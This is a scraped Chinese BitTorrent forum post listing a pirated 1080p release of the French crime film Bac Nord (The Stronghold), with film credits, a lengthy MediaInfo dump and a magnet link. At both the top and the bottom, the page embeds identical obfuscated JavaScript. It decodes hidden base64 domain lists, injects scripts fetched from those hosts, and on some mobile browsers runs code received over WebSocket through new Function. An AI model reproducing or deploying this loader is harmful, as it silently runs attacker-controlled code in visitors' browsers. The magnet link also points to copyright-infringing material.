北区侦缉队[中文字幕].The.Stronghold.2021.1080p.NF.WEB-DL.DDP5.1.x264 5.87GB

版主小s 1月前 414

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x6a\x79\x50\x6e\x4a\x66\x6d\x45\x43']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 北区侦缉队
◎片  名 Bac Nord
◎年  代 2020
◎产  地 法国
◎类  别 惊悚 / 犯罪
◎语  言 法语
◎上映日期 2020-10-16(法国) / 2021-08-18(法国)
◎IMDb链接 https://www.imdb.com/title/tt10404944/
◎豆瓣链接 https://movie.douban.com/subject/33459140/
◎片  长 105分钟
◎导  演 塞德里克·吉门内兹 Cédric Jimenez (id:1342984)
◎编  剧 塞德里克·吉门内兹 Cédric Jimenez (id:1342984)
       奥黛丽·迪万 Audrey Diwan (id:1348320)
       本杰明·查比特 Benjamin Charbit (id:1404262)
◎演  员 吉尔·勒卢什 Gilles Lellouche (id:1274262)
       弗朗索瓦·西维尔 Fran?ois Civil (id:1006321)
       卡里姆·莱克路 Karim Leklou (id:1341821)
       阿黛尔·艾克萨勒霍布洛斯 Adèle Exarchopoulos (id:1328876)
       约夫·摩尔 Yov Moor (id:1404549)

◎标  签 法国 / 电影 / 犯罪 / 法国电影 / 动作 / 2021 / P-CannesE非竞赛&午夜展映 / 政治

◎简  介
  吉尔·勒卢什([小小的白色谎言])、弗朗索瓦·西维尔([浓情酒乡])、卡里姆·莱克路([世界属于你])、阿黛尔·艾克萨勒霍布洛斯将主演新片[渡轮北部](Bac Nord,暂译),塞德里克·吉门内兹([法国缉毒风云])执导。塞德里克与奥黛丽·迪万、本杰明·查比特([自由了!])共同操刀剧本。故事围绕马赛北部的一支警察大队展开,该地区的犯罪率高于法国其他地区。该片将于8月5日开拍。

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 127471057970453828152571805296337074922 (0x5FE60862E17E7F900CEBE54DD6BBBAEA)
  4. Complete name                            : [email protected].mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 5.87 GiB
  8. Duration                                 : 1 h 45 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 7 995 kb/s
  11. Encoded date                             : UTC 2021-09-17 11:23:51
  12. Writing application                      : mkvmerge v44.0.0 ('Domino') 64-bit
  13. Writing library                          : libebml v1.3.10 + libmatroska v1.5.2
  14. Video
  15. ID                                       : 1
  16. Format                                   : AVC
  17. Format/Info                              : Advanced Video Codec
  18. Format profile                           : [email protected]
  19. Format settings                          : CABAC / 3 Ref Frames
  20. Format settings, CABAC                   : Yes
  21. Format settings, Reference frames        : 3 frames
  22. Codec ID                                 : V_MPEG4/ISO/AVC
  23. Duration                                 : 1 h 45 min
  24. Bit rate mode                            : Variable
  25. Bit rate                                 : 2 227 kb/s
  26. Nominal bit rate                         : 3 002 kb/s
  27. Maximum bit rate                         : 4 740 kb/s
  28. Width                                    : 1 920 pixels
  29. Height                                   : 1 080 pixels
  30. Display aspect ratio                     : 16:9
  31. Frame rate mode                          : Constant
  32. Frame rate                               : 24.000 FPS
  33. Color space                              : YUV
  34. Chroma subsampling                       : 4:2:0
  35. Bit depth                                : 8 bits
  36. Scan type                                : Progressive
  37. Bits/(Pixel*Frame)                       : 0.045
  38. Stream size                              : 1.64 GiB (28%)
  39. Writing library                          : x264 core 148 r2724 dbe0335
  40. Encoding settings                        : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=24 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=3002 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=4740 / vbv_bufsize=6320 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00
  41. Default                                  : Yes
  42. Forced                                   : No
  43. Audio #1
  44. ID                                       : 2
  45. Format                                   : E-AC-3
  46. Format/Info                              : Enhanced AC-3
  47. Commercial name                          : Dolby Digital Plus
  48. Codec ID                                 : A_EAC3
  49. Duration                                 : 1 h 45 min
  50. Bit rate mode                            : Constant
  51. Bit rate                                 : 640 kb/s
  52. Channel(s)                               : 6 channels
  53. Channel layout                           : L R C LFE Ls Rs
  54. Sampling rate                            : 48.0 kHz
  55. Frame rate                               : 31.250 FPS (1536 SPF)
  56. Compression mode                         : Lossy
  57. Stream size                              : 481 MiB (8%)
  58. Title                                    : French
  59. Language                                 : French
  60. Service kind                             : Complete Main
  61. Default                                  : Yes
  62. Forced                                   : No
  63. Audio #2
  64. ID                                       : 3
  65. Format                                   : E-AC-3
  66. Format/Info                              : Enhanced AC-3
  67. Commercial name                          : Dolby Digital Plus
  68. Codec ID                                 : A_EAC3
  69. Duration                                 : 1 h 45 min
  70. Bit rate mode                            : Constant
  71. Bit rate                                 : 640 kb/s
  72. Channel(s)                               : 6 channels
  73. Channel layout                           : L R C LFE Ls Rs
  74. Sampling rate                            : 48.0 kHz
  75. Frame rate                               : 31.250 FPS (1536 SPF)
  76. Compression mode                         : Lossy
  77. Stream size                              : 481 MiB (8%)
  78. Title                                    : English
  79. Language                                 : English
  80. Service kind                             : Complete Main
  81. Default                                  : No
  82. Forced                                   : No
  83. Audio #3
  84. ID                                       : 4
  85. Format                                   : E-AC-3
  86. Format/Info                              : Enhanced AC-3
  87. Commercial name                          : Dolby Digital Plus
  88. Codec ID                                 : A_EAC3
  89. Duration                                 : 1 h 45 min
  90. Bit rate mode                            : Constant
  91. Bit rate                                 : 640 kb/s
  92. Channel(s)                               : 6 channels
  93. Channel layout                           : L R C LFE Ls Rs
  94. Sampling rate                            : 48.0 kHz
  95. Frame rate                               : 31.250 FPS (1536 SPF)
  96. Compression mode                         : Lossy
  97. Stream size                              : 481 MiB (8%)
  98. Title                                    : German
  99. Language                                 : German
  100. Service kind                             : Complete Main
  101. Default                                  : No
  102. Forced                                   : No
  103. Audio #4
  104. ID                                       : 5
  105. Format                                   : E-AC-3
  106. Format/Info                              : Enhanced AC-3
  107. Commercial name                          : Dolby Digital Plus
  108. Codec ID                                 : A_EAC3
  109. Duration                                 : 1 h 45 min
  110. Bit rate mode                            : Constant
  111. Bit rate                                 : 640 kb/s
  112. Channel(s)                               : 6 channels
  113. Channel layout                           : L R C LFE Ls Rs
  114. Sampling rate                            : 48.0 kHz
  115. Frame rate                               : 31.250 FPS (1536 SPF)
  116. Compression mode                         : Lossy
  117. Stream size                              : 481 MiB (8%)
  118. Title                                    : Italian
  119. Language                                 : Italian
  120. Service kind                             : Complete Main
  121. Default                                  : No
  122. Forced                                   : No
  123. Audio #5
  124. ID                                       : 6
  125. Format                                   : E-AC-3
  126. Format/Info                              : Enhanced AC-3
  127. Commercial name                          : Dolby Digital Plus
  128. Codec ID                                 : A_EAC3
  129. Duration                                 : 1 h 45 min
  130. Bit rate mode                            : Constant
  131. Bit rate                                 : 640 kb/s
  132. Channel(s)                               : 6 channels
  133. Channel layout                           : L R C LFE Ls Rs
  134. Sampling rate                            : 48.0 kHz
  135. Frame rate                               : 31.250 FPS (1536 SPF)
  136. Compression mode                         : Lossy
  137. Stream size                              : 481 MiB (8%)
  138. Title                                    : Polish
  139. Language                                 : Polish
  140. Service kind                             : Complete Main
  141. Default                                  : No
  142. Forced                                   : No
  143. Audio #6
  144. ID                                       : 7
  145. Format                                   : E-AC-3
  146. Format/Info                              : Enhanced AC-3
  147. Commercial name                          : Dolby Digital Plus
  148. Codec ID                                 : A_EAC3
  149. Duration                                 : 1 h 45 min
  150. Bit rate mode                            : Constant
  151. Bit rate                                 : 640 kb/s
  152. Channel(s)                               : 6 channels
  153. Channel layout                           : L R C LFE Ls Rs
  154. Sampling rate                            : 48.0 kHz
  155. Frame rate                               : 31.250 FPS (1536 SPF)
  156. Compression mode                         : Lossy
  157. Stream size                              : 481 MiB (8%)
  158. Title                                    : Brazilian Portuguese
  159. Language                                 : Portuguese
  160. Service kind                             : Complete Main
  161. Default                                  : No
  162. Forced                                   : No
  163. Audio #7
  164. ID                                       : 8
  165. Format                                   : E-AC-3
  166. Format/Info                              : Enhanced AC-3
  167. Commercial name                          : Dolby Digital Plus
  168. Codec ID                                 : A_EAC3
  169. Duration                                 : 1 h 45 min
  170. Bit rate mode                            : Constant
  171. Bit rate                                 : 640 kb/s
  172. Channel(s)                               : 6 channels
  173. Channel layout                           : L R C LFE Ls Rs
  174. Sampling rate                            : 48.0 kHz
  175. Frame rate                               : 31.250 FPS (1536 SPF)
  176. Compression mode                         : Lossy
  177. Stream size                              : 481 MiB (8%)
  178. Title                                    : Spanish
  179. Language                                 : Spanish
  180. Service kind                             : Complete Main
  181. Default                                  : No
  182. Forced                                   : No
  183. Audio #8
  184. ID                                       : 9
  185. Format                                   : E-AC-3
  186. Format/Info                              : Enhanced AC-3
  187. Commercial name                          : Dolby Digital Plus
  188. Codec ID                                 : A_EAC3
  189. Duration                                 : 1 h 45 min
  190. Bit rate mode                            : Constant
  191. Bit rate                                 : 640 kb/s
  192. Channel(s)                               : 6 channels
  193. Channel layout                           : L R C LFE Ls Rs
  194. Sampling rate                            : 48.0 kHz
  195. Frame rate                               : 31.250 FPS (1536 SPF)
  196. Compression mode                         : Lossy
  197. Stream size                              : 481 MiB (8%)
  198. Title                                    : European Spanish
  199. Language                                 : Spanish
  200. Service kind                             : Complete Main
  201. Default                                  : No
  202. Forced                                   : No
  203. Audio #9
  204. ID                                       : 10
  205. Format                                   : E-AC-3
  206. Format/Info                              : Enhanced AC-3
  207. Commercial name                          : Dolby Digital Plus
  208. Codec ID                                 : A_EAC3
  209. Duration                                 : 1 h 45 min
  210. Bit rate mode                            : Constant
  211. Bit rate                                 : 640 kb/s
  212. Channel(s)                               : 6 channels
  213. Channel layout                           : L R C LFE Ls Rs
  214. Sampling rate                            : 48.0 kHz
  215. Frame rate                               : 31.250 FPS (1536 SPF)
  216. Compression mode                         : Lossy
  217. Stream size                              : 481 MiB (8%)
  218. Title                                    : Turkish
  219. Language                                 : Turkish
  220. Service kind                             : Complete Main
  221. Default                                  : No
  222. Forced                                   : No
  223. Text #1
  224. ID                                       : 11
  225. Format                                   : UTF-8
  226. Codec ID                                 : S_TEXT/UTF8
  227. Codec ID/Info                            : UTF-8 Plain Text
  228. Duration                                 : 1 h 38 min
  229. Bit rate                                 : 49 b/s
  230. Count of elements                        : 1266
  231. Stream size                              : 35.5 KiB (0%)
  232. Title                                    : English
  233. Language                                 : English
  234. Default                                  : Yes
  235. Forced                                   : No
  236. Text #2
  237. ID                                       : 12
  238. Format                                   : UTF-8
  239. Codec ID                                 : S_TEXT/UTF8
  240. Codec ID/Info                            : UTF-8 Plain Text
  241. Duration                                 : 1 h 38 min
  242. Bit rate                                 : 87 b/s
  243. Count of elements                        : 1264
  244. Stream size                              : 62.8 KiB (0%)
  245. Title                                    : Arabic
  246. Language                                 : Arabic
  247. Default                                  : No
  248. Forced                                   : No
  249. Text #3
  250. ID                                       : 13
  251. Format                                   : UTF-8
  252. Codec ID                                 : S_TEXT/UTF8
  253. Codec ID/Info                            : UTF-8 Plain Text
  254. Duration                                 : 1 h 44 min
  255. Bit rate                                 : 53 b/s
  256. Count of elements                        : 1265
  257. Stream size                              : 40.7 KiB (0%)
  258. Title                                    : Chinese Simplified
  259. Language                                 : Chinese
  260. Default                                  : No
  261. Forced                                   : No
  262. Text #4
  263. ID                                       : 14
  264. Format                                   : UTF-8
  265. Codec ID                                 : S_TEXT/UTF8
  266. Codec ID/Info                            : UTF-8 Plain Text
  267. Duration                                 : 1 h 38 min
  268. Bit rate                                 : 56 b/s
  269. Count of elements                        : 1251
  270. Stream size                              : 40.6 KiB (0%)
  271. Title                                    : Chinese Traditional
  272. Language                                 : Chinese
  273. Default                                  : No
  274. Forced                                   : No
  275. Text #5
  276. ID                                       : 15
  277. Format                                   : UTF-8
  278. Codec ID                                 : S_TEXT/UTF8
  279. Codec ID/Info                            : UTF-8 Plain Text
  280. Duration                                 : 1 h 44 min
  281. Bit rate                                 : 42 b/s
  282. Count of elements                        : 1224
  283. Stream size                              : 32.1 KiB (0%)
  284. Title                                    : Croatian
  285. Language                                 : Croatian
  286. Default                                  : No
  287. Forced                                   : No
  288. Text #6
  289. ID                                       : 16
  290. Format                                   : UTF-8
  291. Codec ID                                 : S_TEXT/UTF8
  292. Codec ID/Info                            : UTF-8 Plain Text
  293. Duration                                 : 1 h 44 min
  294. Bit rate                                 : 45 b/s
  295. Count of elements                        : 1278
  296. Stream size                              : 34.5 KiB (0%)
  297. Title                                    : Czech
  298. Language                                 : Czech
  299. Default                                  : No
  300. Forced                                   : No
  301. Text #7
  302. ID                                       : 17
  303. Format                                   : UTF-8
  304. Codec ID                                 : S_TEXT/UTF8
  305. Codec ID/Info                            : UTF-8 Plain Text
  306. Duration                                 : 1 h 44 min
  307. Bit rate                                 : 44 b/s
  308. Count of elements                        : 1192
  309. Stream size                              : 33.8 KiB (0%)
  310. Title                                    : Danish
  311. Language                                 : Danish
  312. Default                                  : No
  313. Forced                                   : No
  314. Text #8
  315. ID                                       : 18
  316. Format                                   : UTF-8
  317. Codec ID                                 : S_TEXT/UTF8
  318. Codec ID/Info                            : UTF-8 Plain Text
  319. Duration                                 : 1 h 44 min
  320. Bit rate                                 : 44 b/s
  321. Count of elements                        : 1213
  322. Stream size                              : 33.8 KiB (0%)
  323. Title                                    : Dutch
  324. Language                                 : Dutch
  325. Default                                  : No
  326. Forced                                   : No
  327. Text #9
  328. ID                                       : 19
  329. Format                                   : UTF-8
  330. Codec ID                                 : S_TEXT/UTF8
  331. Codec ID/Info                            : UTF-8 Plain Text
  332. Duration                                 : 1 h 44 min
  333. Bit rate                                 : 42 b/s
  334. Count of elements                        : 910
  335. Stream size                              : 32.3 KiB (0%)
  336. Title                                    : Finnish
  337. Language                                 : Finnish
  338. Default                                  : No
  339. Forced                                   : No
  340. Text #10
  341. ID                                       : 20
  342. Format                                   : UTF-8
  343. Codec ID                                 : S_TEXT/UTF8
  344. Codec ID/Info                            : UTF-8 Plain Text
  345. Duration                                 : 1 h 35 min
  346. Bit rate                                 : 66 b/s
  347. Count of elements                        : 1443
  348. Stream size                              : 46.7 KiB (0%)
  349. Title                                    : French
  350. Language                                 : French
  351. Default                                  : No
  352. Forced                                   : No
  353. Text #11
  354. ID                                       : 21
  355. Format                                   : UTF-8
  356. Codec ID                                 : S_TEXT/UTF8
  357. Codec ID/Info                            : UTF-8 Plain Text
  358. Duration                                 : 1 h 44 min
  359. Bit rate                                 : 46 b/s
  360. Count of elements                        : 1191
  361. Stream size                              : 35.8 KiB (0%)
  362. Title                                    : German
  363. Language                                 : German
  364. Default                                  : No
  365. Forced                                   : No
  366. Text #12
  367. ID                                       : 22
  368. Format                                   : UTF-8
  369. Codec ID                                 : S_TEXT/UTF8
  370. Codec ID/Info                            : UTF-8 Plain Text
  371. Duration                                 : 1 h 44 min
  372. Bit rate                                 : 76 b/s
  373. Count of elements                        : 1265
  374. Stream size                              : 58.1 KiB (0%)
  375. Title                                    : Greek
  376. Language                                 : Greek
  377. Default                                  : No
  378. Forced                                   : No
  379. Text #13
  380. ID                                       : 23
  381. Format                                   : UTF-8
  382. Codec ID                                 : S_TEXT/UTF8
  383. Codec ID/Info                            : UTF-8 Plain Text
  384. Duration                                 : 1 h 44 min
  385. Bit rate                                 : 73 b/s
  386. Count of elements                        : 1254
  387. Stream size                              : 56.4 KiB (0%)
  388. Title                                    : Hebrew
  389. Language                                 : Hebrew
  390. Default                                  : No
  391. Forced                                   : No
  392. Text #14
  393. ID                                       : 24
  394. Format                                   : UTF-8
  395. Codec ID                                 : S_TEXT/UTF8
  396. Codec ID/Info                            : UTF-8 Plain Text
  397. Duration                                 : 1 h 44 min
  398. Bit rate                                 : 48 b/s
  399. Count of elements                        : 1193
  400. Stream size                              : 36.6 KiB (0%)
  401. Title                                    : Hungarian
  402. Language                                 : Hungarian
  403. Default                                  : No
  404. Forced                                   : No
  405. Text #15
  406. ID                                       : 25
  407. Format                                   : UTF-8
  408. Codec ID                                 : S_TEXT/UTF8
  409. Codec ID/Info                            : UTF-8 Plain Text
  410. Duration                                 : 1 h 44 min
  411. Bit rate                                 : 45 b/s
  412. Count of elements                        : 1255
  413. Stream size                              : 34.3 KiB (0%)
  414. Title                                    : Indonesian
  415. Language                                 : Indonesian
  416. Default                                  : No
  417. Forced                                   : No
  418. Text #16
  419. ID                                       : 26
  420. Format                                   : UTF-8
  421. Codec ID                                 : S_TEXT/UTF8
  422. Codec ID/Info                            : UTF-8 Plain Text
  423. Duration                                 : 1 h 44 min
  424. Bit rate                                 : 46 b/s
  425. Count of elements                        : 1213
  426. Stream size                              : 35.7 KiB (0%)
  427. Title                                    : Italian
  428. Language                                 : Italian
  429. Default                                  : No
  430. Forced                                   : No
  431. Text #17
  432. ID                                       : 27
  433. Format                                   : UTF-8
  434. Codec ID                                 : S_TEXT/UTF8
  435. Codec ID/Info                            : UTF-8 Plain Text
  436. Duration                                 : 1 h 44 min
  437. Bit rate                                 : 44 b/s
  438. Count of elements                        : 1414
  439. Stream size                              : 34.3 KiB (0%)
  440. Title                                    : Japanese
  441. Language                                 : Japanese
  442. Default                                  : No
  443. Forced                                   : No
  444. Text #18
  445. ID                                       : 28
  446. Format                                   : UTF-8
  447. Codec ID                                 : S_TEXT/UTF8
  448. Codec ID/Info                            : UTF-8 Plain Text
  449. Duration                                 : 1 h 44 min
  450. Bit rate                                 : 59 b/s
  451. Count of elements                        : 1260
  452. Stream size                              : 45.1 KiB (0%)
  453. Title                                    : Korean
  454. Language                                 : Korean
  455. Default                                  : No
  456. Forced                                   : No
  457. Text #19
  458. ID                                       : 29
  459. Format                                   : UTF-8
  460. Codec ID                                 : S_TEXT/UTF8
  461. Codec ID/Info                            : UTF-8 Plain Text
  462. Duration                                 : 1 h 44 min
  463. Bit rate                                 : 45 b/s
  464. Count of elements                        : 1253
  465. Stream size                              : 34.6 KiB (0%)
  466. Title                                    : Malay
  467. Language                                 : Malay
  468. Default                                  : No
  469. Forced                                   : No
  470. Text #20
  471. ID                                       : 30
  472. Format                                   : UTF-8
  473. Codec ID                                 : S_TEXT/UTF8
  474. Codec ID/Info                            : UTF-8 Plain Text
  475. Duration                                 : 1 h 44 min
  476. Bit rate                                 : 38 b/s
  477. Count of elements                        : 1114
  478. Stream size                              : 29.7 KiB (0%)
  479. Title                                    : Norwegian Bokmal
  480. Language                                 : Norwegian Bokmal
  481. Default                                  : No
  482. Forced                                   : No
  483. Text #21
  484. ID                                       : 31
  485. Format                                   : UTF-8
  486. Codec ID                                 : S_TEXT/UTF8
  487. Codec ID/Info                            : UTF-8 Plain Text
  488. Duration                                 : 1 h 44 min
  489. Bit rate                                 : 42 b/s
  490. Count of elements                        : 1229
  491. Stream size                              : 32.5 KiB (0%)
  492. Title                                    : Polish
  493. Language                                 : Polish
  494. Default                                  : No
  495. Forced                                   : No
  496. Text #22
  497. ID                                       : 32
  498. Format                                   : UTF-8
  499. Codec ID                                 : S_TEXT/UTF8
  500. Codec ID/Info                            : UTF-8 Plain Text
  501. Duration                                 : 1 h 44 min
  502. Bit rate                                 : 46 b/s
  503. Count of elements                        : 1221
  504. Stream size                              : 35.2 KiB (0%)
  505. Title                                    : Portuguese
  506. Language                                 : Portuguese
  507. Default                                  : No
  508. Forced                                   : No
  509. Text #23
  510. ID                                       : 33
  511. Format                                   : UTF-8
  512. Codec ID                                 : S_TEXT/UTF8
  513. Codec ID/Info                            : UTF-8 Plain Text
  514. Duration                                 : 1 h 44 min
  515. Bit rate                                 : 47 b/s
  516. Count of elements                        : 1242
  517. Stream size                              : 36.4 KiB (0%)
  518. Title                                    : Brazilian Portuguese
  519. Language                                 : Portuguese
  520. Default                                  : No
  521. Forced                                   : No
  522. Text #24
  523. ID                                       : 34
  524. Format                                   : UTF-8
  525. Codec ID                                 : S_TEXT/UTF8
  526. Codec ID/Info                            : UTF-8 Plain Text
  527. Duration                                 : 1 h 44 min
  528. Bit rate                                 : 51 b/s
  529. Count of elements                        : 1240
  530. Stream size                              : 39.6 KiB (0%)
  531. Title                                    : Romanian
  532. Language                                 : Romanian
  533. Default                                  : No
  534. Forced                                   : No
  535. Text #25
  536. ID                                       : 35
  537. Format                                   : UTF-8
  538. Codec ID                                 : S_TEXT/UTF8
  539. Codec ID/Info                            : UTF-8 Plain Text
  540. Duration                                 : 1 h 38 min
  541. Bit rate                                 : 79 b/s
  542. Count of elements                        : 1240
  543. Stream size                              : 57.2 KiB (0%)
  544. Title                                    : Russian
  545. Language                                 : Russian
  546. Default                                  : No
  547. Forced                                   : No
  548. Text #26
  549. ID                                       : 36
  550. Format                                   : UTF-8
  551. Codec ID                                 : S_TEXT/UTF8
  552. Codec ID/Info                            : UTF-8 Plain Text
  553. Duration                                 : 1 h 44 min
  554. Bit rate                                 : 45 b/s
  555. Count of elements                        : 1247
  556. Stream size                              : 34.7 KiB (0%)
  557. Title                                    : Spanish
  558. Language                                 : Spanish
  559. Default                                  : No
  560. Forced                                   : No
  561. Text #27
  562. ID                                       : 37
  563. Format                                   : UTF-8
  564. Codec ID                                 : S_TEXT/UTF8
  565. Codec ID/Info                            : UTF-8 Plain Text
  566. Duration                                 : 1 h 44 min
  567. Bit rate                                 : 46 b/s
  568. Count of elements                        : 1237
  569. Stream size                              : 35.1 KiB (0%)
  570. Title                                    : European Spanish
  571. Language                                 : Spanish
  572. Default                                  : No
  573. Forced                                   : No
  574. Text #28
  575. ID                                       : 38
  576. Format                                   : UTF-8
  577. Codec ID                                 : S_TEXT/UTF8
  578. Codec ID/Info                            : UTF-8 Plain Text
  579. Duration                                 : 1 h 44 min
  580. Bit rate                                 : 44 b/s
  581. Count of elements                        : 1141
  582. Stream size                              : 33.6 KiB (0%)
  583. Title                                    : Swedish
  584. Language                                 : Swedish
  585. Default                                  : No
  586. Forced                                   : No
  587. Text #29
  588. ID                                       : 39
  589. Format                                   : UTF-8
  590. Codec ID                                 : S_TEXT/UTF8
  591. Codec ID/Info                            : UTF-8 Plain Text
  592. Duration                                 : 1 h 44 min
  593. Bit rate                                 : 119 b/s
  594. Count of elements                        : 1256
  595. Stream size                              : 91.0 KiB (0%)
  596. Title                                    : Thai
  597. Language                                 : Thai
  598. Default                                  : No
  599. Forced                                   : No
  600. Text #30
  601. ID                                       : 40
  602. Format                                   : UTF-8
  603. Codec ID                                 : S_TEXT/UTF8
  604. Codec ID/Info                            : UTF-8 Plain Text
  605. Duration                                 : 1 h 43 min
  606. Bit rate                                 : 45 b/s
  607. Count of elements                        : 1230
  608. Stream size                              : 34.3 KiB (0%)
  609. Title                                    : Turkish
  610. Language                                 : Turkish
  611. Default                                  : No
  612. Forced                                   : No
  613. Text #31
  614. ID                                       : 41
  615. Format                                   : UTF-8
  616. Codec ID                                 : S_TEXT/UTF8
  617. Codec ID/Info                            : UTF-8 Plain Text
  618. Duration                                 : 1 h 44 min
  619. Bit rate                                 : 69 b/s
  620. Count of elements                        : 1255
  621. Stream size                              : 53.1 KiB (0%)
  622. Title                                    : Ukrainian
  623. Language                                 : Ukrainian
  624. Default                                  : No
  625. Forced                                   : No
  626. Text #32
  627. ID                                       : 42
  628. Format                                   : UTF-8
  629. Codec ID                                 : S_TEXT/UTF8
  630. Codec ID/Info                            : UTF-8 Plain Text
  631. Duration                                 : 1 h 44 min
  632. Bit rate                                 : 61 b/s
  633. Count of elements                        : 1247
  634. Stream size                              : 47.2 KiB (0%)
  635. Title                                    : Vietnamese
  636. Language                                 : Vietnamese
  637. Default                                  : No
  638. Forced                                   : No


TAGS 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:F38D5EBE3C0DEB636B71546AD3E1A2FFDD3B9AC7

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x54\x47\x50\x48\x42\x70\x79\x79\x5a\x53']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNrZGxmamtkLnhpbbnlhbbnNhYXMuY29tLGh0dHBzOi8vbb2pza2RramZrbbGQuaG9uZ3J1aWt0LmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};